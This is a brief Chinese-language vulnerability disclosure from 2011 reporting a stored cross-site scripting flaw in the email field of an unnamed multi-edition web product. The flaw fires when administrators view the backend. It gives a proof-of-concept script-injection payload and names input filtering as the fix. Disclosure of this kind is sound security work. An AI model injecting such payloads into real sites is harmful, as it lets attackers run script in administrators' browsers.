# 时间: 2011-01-16
# 作者: B0mbErM@n
# 程序:
# 版本: [公安]2.5.0[政府]v2.8.0[学校]2.5.0[企业]3.7.2 及 以前版本
# 环境: XP&IE6&Firefox/3.6.13
# 漏洞发现:2010-01-15
# 通知厂商:2010-01-16

持久型XSS,后台浏览触发XSS语句

############# XSS #############

asp" target=_blank>
电子邮箱:">[XSS]
例如:"><SCRIPT>alert("XSS");</SCRIPT>

修复:过滤